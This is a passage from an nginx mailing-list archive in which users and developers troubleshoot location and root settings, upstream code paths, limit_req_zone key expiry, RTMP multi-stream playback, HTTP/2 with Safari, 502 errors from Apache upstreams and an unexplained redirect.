Strange that nginx -t didn't say anything wrong with config :( Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268258,268261#msg-268261 From francis at daoine.org Tue Jul 12 20:11:02 2016 From: francis at daoine.org (Francis Daly) Date: Tue, 12 Jul 2016 21:11:02 +0100 Subject: nginx not using root from location In-Reply-To: References: <20160712173008.GO12280@daoine.org> Message-ID: <20160712201102.GP12280@daoine.org> On Tue, Jul 12, 2016 at 03:47:23PM -0400, reaper wrote: Hi there, > Yes! That was it. Thank you. Good stuff. > Strange that nginx -t didn't say anything wrong with config :( There's nothing wrong with the config. It is syntactically correct. When you request /testlocation/, nginx will look for the file /data/www/htdocs/web/testlocation/index.html, then the file /data/www/htdocs/web/testlocation/root, then the file /data/www/htdocs/web/data/www/htdocs/test, and then fail 404, which is exactly what you told it to do. The fact that that is not what you *wanted* to tell nginx to do, is not something that nginx can reliably guess. So it doesn't try. Cheers, f -- Francis Daly francis at daoine.org From francis at daoine.org Tue Jul 12 20:15:43 2016 From: francis at daoine.org (Francis Daly) Date: Tue, 12 Jul 2016 21:15:43 +0100 Subject: Insert Variable Values when loading a Cloud Config? In-Reply-To: References: <20160711183106.GN12280@daoine.org> Message-ID: <20160712201543.GQ12280@daoine.org> On Mon, Jul 11, 2016 at 09:24:11PM -0400, leeand00 wrote: Hi there, > This is just a guess, but probably a hashap...or maybe a DNS server that > assigns them statically. But I suppose CoreOS has to request it from nginx, > so it could probably even just pull it out of the request. 
When you can see what the request is, and what information it includes, and when you can see how nginx-or-something-else can take that information and determine the correct public and private addresses to use, then you may have enough information to configure sub_filter (or something else) to return the content that you want. Most of those missing pieces are not nginx-specific. There might be someone here who knows about them; but if they are CoreOS-specific, you may have better luck on a CoreOS list. Good luck with it, f -- Francis Daly francis at daoine.org From nginx at 2xlp.com Tue Jul 12 22:45:21 2016 From: nginx at 2xlp.com (Jonathan Vanasco) Date: Tue, 12 Jul 2016 18:45:21 -0400 Subject: forced 404 without a location display ? In-Reply-To: <20160711202757.GI57459@mdounin.ru> References: <6120616F-3CA5-4629-AABE-608D2E977A38@2xlp.com> <20160711202757.GI57459@mdounin.ru> Message-ID: On Jul 11, 2016, at 4:27 PM, Maxim Dounin wrote: > No location information is added by nginx to error pages, and > never was. You are probably using something with 3rd party > patches. An obvious fix is to switch to using vanilla nginx > instead, it can be downloaded here: On Jul 11, 2016, at 4:25 PM, Oleg A. Mamontov wrote: > ============================================= > location /paths/to/ { > if ( !-f /etc/nginx/_flags/is_running ) { > rewrite ^ /is_running last; > } > } > location = /is_running { > internal; > return 404 'nothing\n'; > } > ============================================= Thanks to you both! I spent way more time than I should tracking the issue. I finally figured it out. Details below: 1. I am using a non-standard nginx -- I run openresty. I thought this might have been the issue so started creating test-cases to pin down, and running against all the nginx & openresty versions. I could not consistently get this to repeat. 2. The first part of the problem is that I had `break` on my rewrite, instead of `last`. 3. 
The second part of my problem -- and this is where the confusion happened -- was that a proxy_pass was involved. Using `last`, what I wanted happened. Using `break`, the rewrite to `/is_running` got passed to the proxy_pass, and the application was creating the error message. The app's error message template was very similar to nginx's -- and that threw me off. I only figured this out because nginx served an error when the application was taken offline during an update. From nginx-forum at forum.nginx.org Thu Jul 14 03:09:47 2016 From: nginx-forum at forum.nginx.org (gaoyan09) Date: Wed, 13 Jul 2016 23:09:47 -0400 Subject: ngx_http_upstream_process_non_buffered_request recv question Message-ID: <61a43758f2ba6289f8b7bb06514da576.NginxMailingListEnglish@forum.nginx.org> size = b->end - b->last; if (size && upstream->read->ready) { n = upstream->recv(upstream, b->last, size); if (n == NGX_AGAIN) { break; } if (n > 0) { u->state->response_length += n; if (u->input_filter(u->input_filter_ctx, n) == NGX_ERROR) { ngx_http_upstream_finalize_request(r, u, NGX_ERROR); return; } } do_write = 1; continue; } Why is n==0 or n==NGX_ERROR not considered here, as ngx_http_upstream_process_upgraded does? How is it handled if the upstream connection failed? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268278,268278#msg-268278 From mdounin at mdounin.ru Thu Jul 14 13:00:28 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 14 Jul 2016 16:00:28 +0300 Subject: ngx_http_upstream_process_non_buffered_request recv question In-Reply-To: <61a43758f2ba6289f8b7bb06514da576.NginxMailingListEnglish@forum.nginx.org> References: <61a43758f2ba6289f8b7bb06514da576.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20160714130027.GS57459@mdounin.ru> Hello!
On Wed, Jul 13, 2016 at 11:09:47PM -0400, gaoyan09 wrote: > size = b->end - b->last; > > if (size && upstream->read->ready) { > > n = upstream->recv(upstream, b->last, size); > > if (n == NGX_AGAIN) { > break; > } > > if (n > 0) { > u->state->response_length += n; > > if (u->input_filter(u->input_filter_ctx, n) == NGX_ERROR) { > ngx_http_upstream_finalize_request(r, u, NGX_ERROR); > return; > } > } > > do_write = 1; > > continue; > } > > Why is n==0 or n==NGX_ERROR not considered here, as > ngx_http_upstream_process_upgraded does? > How is it handled if the upstream connection failed? The upstream->read->eof and upstream->read->error flags are checked separately in the do_write code path, if there are no buffers to send downstream. -- Maxim Dounin http://nginx.org/ From nginx-forum at forum.nginx.org Thu Jul 14 13:20:44 2016 From: nginx-forum at forum.nginx.org (gaoyan09) Date: Thu, 14 Jul 2016 09:20:44 -0400 Subject: ngx_http_upstream_process_non_buffered_request recv question In-Reply-To: <20160714130027.GS57459@mdounin.ru> References: <20160714130027.GS57459@mdounin.ru> Message-ID: <6f331d320ba6ce2141904762eb48236f.NginxMailingListEnglish@forum.nginx.org> Thanks, I see it. This keeps sending to the client even if the upstream connection hits eof or an error, and only finalizes the request when u->busy_bufs == NULL, i.e. once all received buffers have been sent to the client. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268278,268288#msg-268288 From chadhansen at google.com Thu Jul 14 19:22:06 2016 From: chadhansen at google.com (Chad Hansen) Date: Thu, 14 Jul 2016 19:22:06 +0000 Subject: limit_req_zone key cache lifetime Message-ID: I'm looking for documentation or explanation for how keys expire in the limit_req_zone. I have the basic documentation here: *A client IP address serves as a key. Note that instead of $remote_addr, the $binary_remote_addr variable is used here. The $binary_remote_addr variable's size is always 4 bytes for IPv4 addresses or 16 bytes for IPv6 addresses. 
The stored state always occupies 64 bytes on 32-bit platforms and 128 bytes on 64-bit platforms. One megabyte zone can keep about 16 thousand 64-byte states or about 8 thousand 128-byte states. If the zone storage is exhausted, the server will return the 503 (Service Temporarily Unavailable) error to all further requests.* But there's no explanation for how the key cache eventually clears itself. Is any available? -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Thu Jul 14 20:26:26 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 14 Jul 2016 23:26:26 +0300 Subject: limit_req_zone key cache lifetime In-Reply-To: References: Message-ID: <20160714202626.GV57459@mdounin.ru> Hello! On Thu, Jul 14, 2016 at 07:22:06PM +0000, Chad Hansen wrote: > I'm looking for documentation or explanation for how keys expire in the > limit_req_zone. I have the basic documentation here: > > *A client IP address serves as a key. Note that instead of $remote_addr, > the $binary_remote_addr variable is used here. > The $binary_remote_addr variable's size is always 4 bytes for > IPv4 addresses or 16 bytes for IPv6 addresses. The stored state always > occupies 64 bytes on 32-bit platforms and 128 bytes on 64-bit platforms. > One megabyte zone can keep about 16 thousand 64-byte states or about 8 > thousand 128-byte states. If the zone storage is exhausted, the server will > return the 503 (Service Temporarily Unavailable) error to all further > requests.* > > But there's no explanation for how the key cache eventually clears itself. > Is any available? The same page also specifies the algorithm used, http://nginx.org/en/docs/http/ngx_http_limit_req_module.html: : The limitation is done using the "leaky bucket" method. See https://en.wikipedia.org/wiki/Leaky_bucket for further details about the algorithm itself. The algorithm implies that there is no need to store anything for keys where there are no excessive requests. 
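In rough pseudo-code terms, the per-key accounting looks something like the following. This is only an illustrative sketch of the leaky-bucket idea, not nginx's actual implementation, and all names in it are made up:

```python
import time

class LeakyBucket:
    """Sketch of leaky-bucket accounting in the spirit of limit_req:
    per-key 'excess' drains at `rate` requests/second, and a request
    is rejected once the excess would exceed the allowed burst."""

    def __init__(self, rate, burst):
        self.rate = rate      # allowed requests per second (drain rate)
        self.burst = burst    # tolerated excess above the steady rate
        self.state = {}       # key -> (last_seen, excess)

    def allow(self, key, now=None):
        now = time.monotonic() if now is None else now
        last, excess = self.state.get(key, (now, 0.0))
        # Drain the bucket for the elapsed time, then add this request.
        excess = max(0.0, excess - (now - last) * self.rate) + 1.0
        if excess > self.burst + 1.0:
            return False      # over the limit: nginx would answer 503
        self.state[key] = (now, excess)
        # A key whose bucket has fully drained carries no information,
        # which is why such "zero states" can simply be dropped.
        return True
```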
Such zero states are automatically removed by the code when nginx is about to allocate a new state. -- Maxim Dounin http://nginx.org/ From chadhansen at google.com Thu Jul 14 20:30:11 2016 From: chadhansen at google.com (Chad Hansen) Date: Thu, 14 Jul 2016 20:30:11 +0000 Subject: limit_req_zone key cache lifetime In-Reply-To: <20160714202626.GV57459@mdounin.ru> References: <20160714202626.GV57459@mdounin.ru> Message-ID: Great, thank you! On Thu, Jul 14, 2016 at 4:26 PM Maxim Dounin wrote: > Hello! > > On Thu, Jul 14, 2016 at 07:22:06PM +0000, Chad Hansen wrote: > > > I'm looking for documentation or explanation for how keys expire in the > > limit_req_zone. I have the basic documenations here: > > > > *A client IP address serves as a key. Note that instead of $remote_addr, > > the $binary_remote_addr variable is used here. > > The $binary_remote_addr variable?s size is always 4 bytes for > > IPv4 addresses or 16 bytes for IPv6 addresses. The stored state always > > occupies 64 bytes on 32-bit platforms and 128 bytes on 64-bit platforms. > > One megabyte zone can keep about 16 thousand 64-byte states or about 8 > > thousand 128-byte states. If the zone storage is exhausted, the server > will > > return the 503 (Service Temporarily Unavailable) error to all further > > requests.* > > > > But there's no explanation for how the key cache eventually clears > itself. > > Is any available? > > The same page also specifies the algorithm used, > http://nginx.org/en/docs/http/ngx_http_limit_req_module.html: > > : The limitation is done using the ?leaky bucket? method. > > See https://en.wikipedia.org/wiki/Leaky_bucket for further > details about the algorithm itself. > > The algorithm implies that there is no need to store anything for > keys where there are no excessive requests. Such zero states are > automatically removed by the code when nginx is about to allocate > a new state. 
> > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed... URL: From cgupta at adobe.com Fri Jul 15 05:04:49 2016 From: cgupta at adobe.com (Chinoy Gupta) Date: Fri, 15 Jul 2016 05:04:49 +0000 Subject: Getting realpath for a request Message-ID: Hi, I am creating a nginx proxy handler to talk to a backend server. In that handler, I would like to get the physical path of the file to be served by a request. The file can be present in the docroot of nginx or any alias. How can I get this information? Regards, Chinoy -------------- next part -------------- An HTML attachment was scrubbed... URL: From taha.ansari at matechco.com Fri Jul 15 09:59:11 2016 From: taha.ansari at matechco.com (Taha Ansari) Date: Fri, 15 Jul 2016 14:59:11 +0500 Subject: Issue playing back multiple RTMP live streams Message-ID: <005a01d1de7f$8c254280$a46fc780$@matechco.com> Server: Linux CentOS 6.(x) NGINX with RTMP module enabled (compiled myself using an online tutorial) I use FFmpeg to stream to this server, and one stream works perfectly. 
Example of perfectly working stream from IP camera: ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test1 and to pull the stream, I use VLC/FFplay, and rtmp url is like so: ffplay rtmp://[nginx server]:1935/live/test1 Problem comes when I try to stream two streams simultaneously, like so: ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test1 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test2 in this case, both streams is mostly choppy, and sometimes one stream fails to load at all. If I extend this to 10 inputs like so: ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test1 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test2 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test3 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test4 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test5 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test6 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test7 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx 
server]:1935/live/test8 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test9 ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test10 Then although I can see all console are streaming perfectly fine, like so: ffmpeg -loglevel verbose -rtsp_transport tcp -i rtsp://admin:admin@[ip cam address]:554/channel1 -c copy -f flv rtmp://[nginx server]:1935/live/test10 ffmpeg version N-80801-gc0cb53c Copyright (c) 2000-2016 the FFmpeg developers built with gcc 4.4.7 (GCC) 20120313 (Red Hat 4.4.7-17) configuration: --extra-cflags=-I/root/ffmpeg_build/include --extra-ldflags=-L/root/ffmpeg_build/lib --pkg-config-flags=--static --enable-gpl --enable-nonfree --enable-libfdk-aac --enable-libfreetype --enable-libmp3lame --enable-libopus --enable-libvorbis --enable-libvpx --enable-libx264 --enable-libx265 libavutil 55. 27.100 / 55. 27.100 libavcodec 57. 48.101 / 57. 48.101 libavformat 57. 40.101 / 57. 40.101 libavdevice 57. 0.102 / 57. 0.102 libavfilter 6. 46.102 / 6. 46.102 libswscale 4. 1.100 / 4. 1.100 libswresample 2. 1.100 / 2. 1.100 libpostproc 54. 0.100 / 54. 
0.100 [rtsp @ 0x46594e0] SDP: v=0 o=- 45356132 1 IN IP4 192.168.5.100 s=Session streamed by stream i=1 t=0 0 a=tool:LIVE555 Streaming Media v2009.01.26 a=type:broadcast a=control:* a=range:npt=0- a=x-qt-text-nam:Session streamed by stream a=x-qt-text-inf:1 m=video 0 RTP/AVP 96 c=IN IP4 0.0.0.0 b=AS:506 a=framerate:30.00 a=rtpmap:96 H264/90000 a=fmtp:96 packetization-mode=1;profile-level-id=640028;sprop-parameter-sets=Z2QAKKzoB4 AiflQ=,aO48MA== a=control:track1 m=audio 0 RTP/AVP 0 c=IN IP4 0.0.0.0 b=AS:64 a=control:track2 [rtsp @ 0x46594e0] setting jitter buffer size to 0 Last message repeated 1 times Guessed Channel Layout for Input Stream #0.1 : mono Input #0, rtsp, from 'rtsp://admin:admin@[ip cam address]:554/channel1': Metadata: title : Session streamed by stream comment : 1 Duration: N/A, start: 0.000000, bitrate: N/A Stream #0:0: Video: h264 (High), 1 reference frame, yuv420p, 1920x1080 (1920x1088), 30 tbr, 90k tbn, 180k tbc Stream #0:1: Audio: pcm_mulaw, 8000 Hz, 1 channels, s16, 64 kb/s [flv @ 0x4696240] Using AVStream.codec to pass codec parameters to muxers is deprecated, use AVStream.codecpar instead. Last message repeated 1 times Output #0, flv, to 'rtmp://[nginx server]:1935/live/test10': Metadata: title : Session streamed by stream comment : 1 encoder : Lavf57.40.101 Stream #0:0: Video: h264, 1 reference frame ([7][0][0][0] / 0x0007), yuv420p, 1920x1080 (0x0), q=2-31, 30 tbr, 1k tbn, 90k tbc Stream #0:1: Audio: pcm_mulaw ([8][0][0][0] / 0x0008), 8000 Hz, mono, 64 kb/s Stream mapping: Stream #0:0 -> #0:0 (copy) Stream #0:1 -> #0:1 (copy) Press [q] to stop, [?] for help [flv @ 0x4696240] Timestamps are unset in a packet for stream 0. This is deprecated and will stop working in the future. 
Fix your code to set the timestamps properly frame= 42 fps=0.0 q=-1.0 size= 56kB time=00:00:02.83 bitrate= 163.1kbits frame= 54 fps= 46 q=-1.0 size= 62kB time=00:00:03.43 bitrate= 147.6kbits frame= 66 fps= 39 q=-1.0 size= 77kB time=00:00:04.03 bitrate= 157.1kbits frame= 76 fps= 34 q=-1.0 size= 83kB time=00:00:04.53 bitrate= 149.9kbits .. But when I try to pull it using FFplay, I always get this error (Invalid data found when processing input): >ffplay rtmp://[nginx server]:1935/live/test10 ffplay version N-80386-g5f5a97d Copyright (c) 2003-2016 the FFmpeg developers built with gcc 5.4.0 (GCC) configuration: --enable-gpl --enable-version3 --disable-w32threads --enable-nv enc --enable-avisynth --enable-bzlib --enable-fontconfig --enable-frei0r --enabl e-gnutls --enable-iconv --enable-libass --enable-libbluray --enable-libbs2b --en able-libcaca --enable-libfreetype --enable-libgme --enable-libgsm --enable-libil bc --enable-libmodplug --enable-libmfx --enable-libmp3lame --enable-libopencore- amrnb --enable-libopencore-amrwb --enable-libopenjpeg --enable-libopus --enable- librtmp --enable-libschroedinger --enable-libsnappy --enable-libsoxr --enable-li bspeex --enable-libtheora --enable-libtwolame --enable-libvidstab --enable-libvo -amrwbenc --enable-libvorbis --enable-libvpx --enable-libwavpack --enable-libweb p --enable-libx264 --enable-libx265 --enable-libxavs --enable-libxvid --enable-l ibzimg --enable-lzma --enable-decklink --enable-zlib libavutil 55. 24.100 / 55. 24.100 libavcodec 57. 46.100 / 57. 46.100 libavformat 57. 38.100 / 57. 38.100 libavdevice 57. 0.101 / 57. 0.101 libavfilter 6. 46.101 / 6. 46.101 libswscale 4. 1.100 / 4. 1.100 libswresample 2. 1.100 / 2. 1.100 libpostproc 54. 0.100 / 54. 
0.100 RTMP_ReadPacket, failed to read RTMP packet headersq= 0B f=0/0 rtmp://64.49.234.250:1935/live/test10: Invalid data found when processing input nan : 0.000 fd= 0 aq= 0KB vq= 0KB sq= 0B f=0/0 If I enabled verbose log, then this is generated at FFplay: ffplay -loglevel verbose rtmp://[nginx server]:1935/live/test10 ffplay version N-80386-g5f5a97d Copyright (c) 2003-2016 the FFmpeg developers built with gcc 5.4.0 (GCC) configuration: --enable-gpl --enable-version3 --disable-w32threads --enable-nv enc --enable-avisynth --enable-bzlib --enable-fontconfig --enable-frei0r --enabl e-gnutls --enable-iconv --enable-libass --enable-libbluray --enable-libbs2b --en able-libcaca --enable-libfreetype --enable-libgme --enable-libgsm --enable-libil bc --enable-libmodplug --enable-libmfx --enable-libmp3lame --enable-libopencore- amrnb --enable-libopencore-amrwb --enable-libopenjpeg --enable-libopus --enable- librtmp --enable-libschroedinger --enable-libsnappy --enable-libsoxr --enable-li bspeex --enable-libtheora --enable-libtwolame --enable-libvidstab --enable-libvo -amrwbenc --enable-libvorbis --enable-libvpx --enable-libwavpack --enable-libweb p --enable-libx264 --enable-libx265 --enable-libxavs --enable-libxvid --enable-l ibzimg --enable-lzma --enable-decklink --enable-zlib libavutil 55. 24.100 / 55. 24.100 libavcodec 57. 46.100 / 57. 46.100 libavformat 57. 38.100 / 57. 38.100 libavdevice 57. 0.101 / 57. 0.101 libavfilter 6. 46.101 / 6. 46.101 libswscale 4. 1.100 / 4. 1.100 libswresample 2. 1.100 / 2. 1.100 libpostproc 54. 0.100 / 54. 0.100 Parsing... : 0.000 fd= 0 aq= 0KB vq= 0KB sq= 0B f=0/0 Parsed protocol: 0 Parsed host : 64.49.234.250 Parsed app : live RTMP_Connect1, ... 
connected, handshaking= 0KB sq= 0B f=0/0 HandShake: Type Answer : 03q= 0KB vq= 0KB sq= 0B f=0/0 HandShake: Server Uptime : 353698523 HandShake: FMS Version : 0.0.0.0 HandShake: Handshaking finished....0KB vq= 0KB sq= 0B f=0/0 RTMP_Connect1, handshaked Invoking connect HandleServerBW: server BW = 50000000KB vq= 0KB sq= 0B f=0/0 HandleClientBW: client BW = 5000000 2B vq= 0KB sq= 0B f=0/0 HandleChangeChunkSize, received: chunk size change to 4096 RTMP_ClientPacket, received: invoke 190 bytes (object begin) Property: Property: Property: (object begin) Property: Property: (object end) 0.000 fd= 0 aq= 0KB vq= 0KB sq= 0B f=0/0 Property: (object begin) Property: Property: Property: Property: (object end) (object end) HandleInvoke, server invoking <_result> HandleInvoke, received result for method call sending ctrl. type: 0x0003 Invoking createStream RTMP_ClientPacket, received: invoke 29 bytes 0KB sq= 0B f=0/0 (object begin) Property: Property: Property: NULL Property: (object end) HandleInvoke, server invoking <_result> HandleInvoke, received result for method call SendPlay, seekTime=0, stopTime=0, sending play: test10 Invoking play sending ctrl. type: 0x0003 RTMP_ClientPacket, received: invoke 96 bytes 0KB sq= 0B f=0/0 (object begin) Property: Property: Property: NULL Property: (object begin) Property: Property: Property: (object end) (object end) HandleInvoke, server invoking HandleInvoke, onStatus: NetStream.Play.Start RTMP_ClientPacket, received: notify 24 bytes 0KB sq= 0B f=0/0 (object begin) Property: Property: Property: (object end) RTMPSockBuf_Fill, recv returned -1. 
GetSockError(): 10060 (Unknown error) RTMP_ReadPacket, failed to read RTMP packet header Invoking deleteStreamd= 0 aq= 0KB vq= 0KB sq= 0B f=0/0 rtmp://[nginx server]:1935/live/test10: Invalid data found when processing input This is my nginx.conf: #user nobody; worker_processes 4; #error_log logs/error.log; #error_log logs/error.log notice; error_log logs/error.log info; #error_log logs/error.log debug; #pid logs/nginx.pid; events { worker_connections 1024; } http { include mime.types; default_type application/octet-stream; #log_format main '$remote_addr - $remote_user [$time_local] "$request" ' # '$status $body_bytes_sent "$http_referer" ' # '"$http_user_agent" "$http_x_forwarded_for"'; #access_log logs/access.log main; sendfile on; #tcp_nopush on; #keepalive_timeout 0; keepalive_timeout 65; #gzip on; server { listen 80; server_name localhost; #charset koi8-r; #access_log logs/host.access.log main; location / { root /usr/share/nginx/html; index index.html index.htm; } location ~ \.php$ { fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; include fastcgi_params; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; # location = /50x.html { # root html; # } # proxy the PHP scripts to Apache listening on 127.0.0.1:80 # #location ~ \.php$ { # proxy_pass http://127.0.0.1; #} # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # root html; # fastcgi_pass 127.0.0.1:9000; # fastcgi_index index.php; # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; # include fastcgi_params; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} } # another virtual host using mix of IP-, name-, and port-based configuration # #server { # listen 8000; # listen somename:8080; # server_name somename alias another.alias; # location / 
{ # root html; # index index.html index.htm; # } #} # HTTPS server # #server { # listen 443 ssl; # server_name localhost; # ssl_certificate cert.pem; # ssl_certificate_key cert.key; # ssl_session_cache shared:SSL:1m; # ssl_session_timeout 5m; # ssl_ciphers HIGH:!aNULL:!MD5; # ssl_prefer_server_ciphers on; # location / { # root html; # index index.html index.htm; # } #} } rtmp { server { listen 1935; chunk_size 4096; application live { live on; record off; } application vod { play /var/flvs; } } } Can anyone tell why multiple RTMP streams are not being entertained? Is there any streaming restriction on nginx I am unaware of? -------------- next part -------------- An HTML attachment was scrubbed... URL: From devel at jasonwoods.me.uk Fri Jul 15 12:08:16 2016 From: devel at jasonwoods.me.uk (Jason Woods) Date: Fri, 15 Jul 2016 13:08:16 +0100 Subject: Issue with HTTP/2 and async file upload from Safari on iOS In-Reply-To: References: Message-ID: > On 11 Jul 2016, at 09:25, ZaneCEO wrote: > > @itpp2012 : building from source is a no-go for me due to future upgrade > concerns > > @Lukas : will follow your suggestion and try the ngingx-provided bins, > thanks! I?m beginning to hear many reports now of Safari and iOS users hitting connection issues on several websites, not just around upload but any arbitrary POST it seems. Building from source is a no go too, and we?ve always stayed on the feature stable branch as it?s easier to maintain since we don?t need to worry about additional features causing issues. I was anticipating such a compatibility problem to be fixed in feature stable but so far it?s looking like we will have to bite the bullet and move to mainline. Would I be correct here? It seems for our case at least, feature stable HTTP2 is not stable for production use at this time. Jason -------------- next part -------------- A non-text attachment was scrubbed... 
Name: signature.asc Type: application/pgp-signature Size: 455 bytes Desc: Message signed with OpenPGP using GPGMail URL: From luky-37 at hotmail.com Fri Jul 15 12:25:48 2016 From: luky-37 at hotmail.com (Lukas Tribus) Date: Fri, 15 Jul 2016 12:25:48 +0000 Subject: AW: Issue with HTTP/2 and async file upload from Safari on iOS In-Reply-To: References: , Message-ID: > I was anticipating such a compatibility problem to be fixed in feature stable but so far it?s looking like we will have to bite the bullet and move to mainline. > Would I be correct here? It seems for our case at least, feature stable HTTP2 is not stable for production use at this time. Correct. It has been stated multiple times that mainline is the suggested branch for HTTP2 use and that statement is still true. So yes, do not use the stable branch if using HTTP2. Lukas From nginx-forum at forum.nginx.org Fri Jul 15 17:22:16 2016 From: nginx-forum at forum.nginx.org (maltris) Date: Fri, 15 Jul 2016 13:22:16 -0400 Subject: "502 Bad Gateway" on first request in a setup with Apache 2.4-servers as upstreams Message-ID: The error I am getting in the logs: "upstream prematurely closed connection while reading response header from upstream" After the first request it works for 10-15 seconds without any problem. According to tcpdump in the first request (the failing one) the upstream is receiving one GET and nothing more. I found one workaround (https://hashnode.com/post/how-to-configure-nginx-to-hold-the-connections-and-retry-if-the-proxied-server-returns-502-cilngkof700iteq53ratetsry) which is adding the same upstream twice and adding the "backup"-option. The first request then fails but the second in all of my cases succeeds (checked via logs and tcpdump). Any ideas (also some comments that could lead me to the solution would be helpful)? 
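In case it helps anyone reproduce this, the workaround from that post boils down to something like the following (paraphrased; the upstream name and address here are placeholders for my Apache 2.4 backend):

```nginx
upstream apache_backend {
    server 192.0.2.10:80;
    # The same server listed again as "backup": when the first attempt
    # dies with the premature close, nginx retries against this entry.
    server 192.0.2.10:80 backup;
}

server {
    location / {
        # Retry the next upstream on the errors I'm seeing instead of
        # returning 502 to the client straight away.
        proxy_next_upstream error timeout http_502;
        proxy_pass http://apache_backend;
    }
}
```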
Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268306,268306#msg-268306 From h.aboulfeth at genious.Net Fri Jul 15 21:58:07 2016 From: h.aboulfeth at genious.Net (Hamza Aboulfeth) Date: Fri, 15 Jul 2016 22:58:07 +0100 Subject: Weird problem with redirects Message-ID: <57895C6F.6080707@genious.Net> Hello, I have a weird problem that suddenly appeared on a client's website yesterday. We have a redirection from non www to www and sometimes the redirection sends somewhere else: [root at genious33 nginx-1.11.2]# curl -IL -H "host: hespress.com" x.x.x.x HTTP/1.1 301 Moved Permanently Server: nginx/1.11.2 Date: Fri, 15 Jul 2016 21:54:06 GMT Content-Type: text/html Content-Length: 185 Connection: keep-alive Location: http://1755118213 .com/ dbg-redirect: nginx HTTP/1.1 302 Found Server: nginx/1.2.1 Date: Fri, 15 Jul 2016 21:52:37 GMT Content-Type: text/html; charset=iso-8859-1 Connection: keep-alive Set-Cookie: orgje=JbgbADQAAgABACVbiVf__yVbiVdAAAEAAAAlW4lXAA--; expires=Sat, 15-Jul-2017 21:52:37 GMT; path=/; domain=traffsell.com Location: http://m.xxx.com/ HTTP/1.1 200 OK Date: Fri, 15 Jul 2016 21:52:37 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Set-Cookie: __cfduid=d5624eb7a789e21f082873681ec36a41b1468619557; expires=Sat, 15-Jul-17 21:52:37 GMT; path=/; domain=.hibapress.com; HttpOnly X-Powered-By: PHP/5.3.27 X-LiteSpeed-Cache: hit Vary: Accept-Encoding X-Turbo-Charged-By: LiteSpeed Server: cloudflare-nginx CF-RAY: 2c307148667c3f77-YUL Sometimes it acts as it should sometimes it redirect somewhere else If you have any clue about what's happening, do help me :) Thank you, Hamza From francis at daoine.org Sat Jul 16 07:47:19 2016 From: francis at daoine.org (Francis Daly) Date: Sat, 16 Jul 2016 08:47:19 +0100 Subject: Weird problem with redirects In-Reply-To: <57895C6F.6080707@genious.Net> References: <57895C6F.6080707@genious.Net> Message-ID: <20160716074719.GR12280@daoine.org> On Fri, Jul 15, 2016 at 10:58:07PM +0100, Hamza Aboulfeth 
wrote: Hi there, > I have a weird problem that suddenly appeared on a client's website > yesterday. We have a redirection from non www to www and sometimes > the redirection sends somewhere else: > > [root at genious33 nginx-1.11.2]# curl -IL -H "host: hespress.com" x.x.x.x If that x.x.x.x is enough to make sure that this request gets to your nginx, then your nginx config is probably involved. If this only started yesterday, then changes since yesterday (or since your nginx was last restarted before yesterday) are probably most interesting. And as a very long shot: if you can "tcpdump" to see that nginx is sending one thing, but the client is receiving something else, then you'll want to look outside nginx at something else interfering with the traffic. Good luck with it, f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Sat Jul 16 08:31:18 2016 From: nginx-forum at forum.nginx.org (skorpinok) Date: Sat, 16 Jul 2016 04:31:18 -0400 Subject: Images loaded but not displaying Message-ID: <57b40e55436b16b14e2832f89b12b86c.NginxMailingListEnglish@forum.nginx.org> Hi, i have installed nginx/1.2.1 on a debian 7 server, the image seems to have been loaded but shows broken & are not displayed on my index.html page here is what did, html> Welcome to nginx!

Welcome to nginx!

